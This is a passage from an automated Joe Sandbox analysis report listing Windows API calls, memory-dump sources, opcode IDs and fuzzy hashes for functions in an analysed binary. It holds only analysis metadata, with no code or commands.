                                                                                                                                                                                                                                      • API String ID: 357397906-0
                                                                                                                                                                                                                                      • Opcode ID: a662b56b508b605e651ef03b7edcdd47b4a7e56e7815da0ab2cfc40e5db6643a
                                                                                                                                                                                                                                      • Instruction ID: fb23094d781b5158c887b8a8480beace5b7b2724a925cb548ba9680f150799de
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a662b56b508b605e651ef03b7edcdd47b4a7e56e7815da0ab2cfc40e5db6643a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 511140B9D04209AFDB41CFA9C884AEEBBB5FB48314F108166E915E2210D735AA64CF51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00F3170C,?,?,00E78DA7,00F33514), ref: 00E80482
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00F3170C,?,00E78DA7,00F33514), ref: 00E804B5
                                                                                                                                                                                                                                      • SetEvent.KERNEL32(00000000,00F33514), ref: 00E80543
                                                                                                                                                                                                                                      • ResetEvent.KERNEL32 ref: 00E8054F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalEventSection$EnterLeaveReset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3553466030-0
                                                                                                                                                                                                                                      • Opcode ID: abb290a4081acc54de92da57f9057c8a5a91672de876ebe3aae42e53bdcbb754
                                                                                                                                                                                                                                      • Instruction ID: 84c0de0169b5f7695f8feed2225c1bdc8afeb4fd970011036333d0f1befe827d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abb290a4081acc54de92da57f9057c8a5a91672de876ebe3aae42e53bdcbb754
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B017C316052289FCB14DF18FD489A83BA6FB89761B040019E906E3330CB309C02EF95
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00EC3451
                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EC3462
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00EC3469
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00EC3470
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2710830443-0
                                                                                                                                                                                                                                      • Opcode ID: 2bf9b5383b70fe3a7e118c51e21f91069cd50ae59474f12eb44d09c097f121bd
                                                                                                                                                                                                                                      • Instruction ID: 657692628937889a08d432dd6b189cacd8dfa209f07f94a6642a78b97256c577
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2bf9b5383b70fe3a7e118c51e21f91069cd50ae59474f12eb44d09c097f121bd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C3E06DB1609224BBD7201B739C0DFFB7F6DEB82BA1F004019F209F60809AA58A45D2B1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E7983F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E79899
                                                                                                                                                                                                                                        • Part of subcall function 00E7983F: SelectObject.GDI32(?,00000000), ref: 00E798A8
                                                                                                                                                                                                                                        • Part of subcall function 00E7983F: BeginPath.GDI32(?), ref: 00E798BF
                                                                                                                                                                                                                                        • Part of subcall function 00E7983F: SelectObject.GDI32(?,00000000), ref: 00E798E8
                                                                                                                                                                                                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00EF90A8
                                                                                                                                                                                                                                      • LineTo.GDI32(?,?,?), ref: 00EF90B5
                                                                                                                                                                                                                                      • EndPath.GDI32(?), ref: 00EF90C5
                                                                                                                                                                                                                                      • StrokePath.GDI32(?), ref: 00EF90D3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1539411459-0
                                                                                                                                                                                                                                      • Opcode ID: e9cd62554ef1f3f43b8d2919e0cfd0ad6636b3347b4f0ecc40d5b11216496ec2
                                                                                                                                                                                                                                      • Instruction ID: 9dcc3db410df8615ef8164c00e5e6b0bdb0ca7add9e34cbdb45cbd871c530814
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e9cd62554ef1f3f43b8d2919e0cfd0ad6636b3347b4f0ecc40d5b11216496ec2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37F05E31006259BADB125F55AC0EFEE3F5BAF46324F048041FA11320E2CB755525DBA9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00E80D2F
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00E80D3E
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00E80D47
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00E80D54
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                                                      • Opcode ID: 9e0e96514b445075ee39e65e67872e7d48430facc4b97c76c5d5bce5e548ed9d
                                                                                                                                                                                                                                      • Instruction ID: ab9bf0ac33606f48a1622ec86b8a09d61ebacdc4e124173dcaecb3a7b395a1cd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e0e96514b445075ee39e65e67872e7d48430facc4b97c76c5d5bce5e548ed9d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7F09D70C15208EFCB00DBB1C949AAEBBB8EF48205F9144959402F7150D634AB08DB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000008), ref: 00E79ACC
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,?), ref: 00E79AD6
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00E79AE9
                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000005), ref: 00E79AF1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4037423528-0
                                                                                                                                                                                                                                      • Opcode ID: e94d9fa0f4683b4c9251d51c92a1bfbe11d0ea3356f1c93f52e2543ac8621ab5
                                                                                                                                                                                                                                      • Instruction ID: 8c4b5b04898ae3cac5298ef8105454e95a27ea2e4d36ce8682f59bfbaada5870
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e94d9fa0f4683b4c9251d51c92a1bfbe11d0ea3356f1c93f52e2543ac8621ab5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABE06531248240AEDB215B75BC09BFD7F12AB91336F148215F6F9640E0C7724544DB10
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 00EC1CBE
                                                                                                                                                                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00EC1863), ref: 00EC1CC5
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00EC1863), ref: 00EC1CD2
                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00EC1863), ref: 00EC1CD9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3974789173-0
                                                                                                                                                                                                                                      • Opcode ID: c040b2ba6d06023c29e0627633433b0a97d339bba95104d31af3e13ba76b0664
                                                                                                                                                                                                                                      • Instruction ID: 7ada87a30608e471e6471fc3d7d0cc7df35ffc7ae37ac60265c68c29530f7926
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c040b2ba6d06023c29e0627633433b0a97d339bba95104d31af3e13ba76b0664
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90E08636746211DFE7201FE29E0CF667F6DEF81795F104448B246E9090EA75844AC750
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00EBE924
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00EBE92E
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EBE94E
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?), ref: 00EBE96F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                                                                                      • Opcode ID: 382563c9ab5a059bbbdf83d620d3b468a0483cf36813be1bacac17f84f9d44cb
                                                                                                                                                                                                                                      • Instruction ID: 416bd9c99409434f8d1454a68a5ee77478966e680a4e26a0a12778c35db9c935
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 382563c9ab5a059bbbdf83d620d3b468a0483cf36813be1bacac17f84f9d44cb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0E01AB0908204DFCB419FA29C08AADBFB2FB88311F118445E84AF7350DB785A15EF00
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00EBE938
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00EBE942
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EBE94E
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?), ref: 00EBE96F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                                                                                      • Opcode ID: 5cc2812dc2f3f179d9bd210a56576da42854b4079076f3429b9c87f2fc21c27b
                                                                                                                                                                                                                                      • Instruction ID: 3a63c59e3a11c1f5ad5d7447c6a2cc5232e95a74249fb3c12fa9255f4a92f882
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cc2812dc2f3f179d9bd210a56576da42854b4079076f3429b9c87f2fc21c27b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26E012B0D08204EFCB419FA29C08A6DBFB2BB88310B118409E84AF7250CB386A15EF00
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00ED9D35
                                                                                                                                                                                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00ED9DD5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileName$OpenSave
                                                                                                                                                                                                                                      • String ID: X
                                                                                                                                                                                                                                      • API String ID: 3924019920-3081909835
                                                                                                                                                                                                                                      • Opcode ID: d3948ab47f4ba7773c490507a50c2c0b073020ce53bc494c774629e0584cc6d4
                                                                                                                                                                                                                                      • Instruction ID: 1d893bd54a526f3fe33e2ce15228993f21a817c8d3cd7cc643f2068497a577d2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3948ab47f4ba7773c490507a50c2c0b073020ce53bc494c774629e0584cc6d4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69E1A3316083408FC714EF24D881A6AB7E5FF84354F04996EF899AB3A2DB31DD45CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00ED5724
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Connection
                                                                                                                                                                                                                                      • String ID: *$LPT
                                                                                                                                                                                                                                      • API String ID: 1722446006-3443410124
                                                                                                                                                                                                                                      • Opcode ID: d881715bfb6f388ae3a4a854ac06a18c74fbb1eac4957b32d10fcbc280c1ecc9
                                                                                                                                                                                                                                      • Instruction ID: 194024efacb4ee129faeb3466dd07ea370073052a7259434b9259b0771fd5e7d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d881715bfb6f388ae3a4a854ac06a18c74fbb1eac4957b32d10fcbc280c1ecc9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD919476A00604DFCB14DF54C484EA9BBF5EF45308F19909AE81AAF362D731ED86CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(`],00000000,?,00EFDCD0,00000000,?,00000000,00000000), ref: 00EE8094
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(`],00000000,?,00EFDCD0,?,00000000,00000000), ref: 00EE8136
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                                                                                      • String ID: `]
                                                                                                                                                                                                                                      • API String ID: 3964851224-306494964
                                                                                                                                                                                                                                      • Opcode ID: 492b92c20f427c7ff6971c7da5fa55e3d6c489d3890450c5051dc0fdf125c30e
                                                                                                                                                                                                                                      • Instruction ID: 7bd56e847676b808d85e165e7c76c036968008e0ea0314c9c9a13aafd2f0893e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 492b92c20f427c7ff6971c7da5fa55e3d6c489d3890450c5051dc0fdf125c30e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4616E32950159EACF10EBE5ED919FDB3B8BF14384F446029E546B7092EF305A4ADBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: #
                                                                                                                                                                                                                                      • API String ID: 0-1885708031
                                                                                                                                                                                                                                      • Opcode ID: 4cb9fd6a4a5624b4a3c88cc02855b3786dc75154b46a72231dac9f3ef4a90e08
                                                                                                                                                                                                                                      • Instruction ID: 62aee03447f750064186cf9ed814fb8d98c6dd400ccbebb61a64a6639c403b63
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4cb9fd6a4a5624b4a3c88cc02855b3786dc75154b46a72231dac9f3ef4a90e08
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA512031504206DFDB19DF68C454AFE7BE8EF55718F28A069E891BB2D0DA309D42CB62
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 00E7F694
                                                                                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E7F6AD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
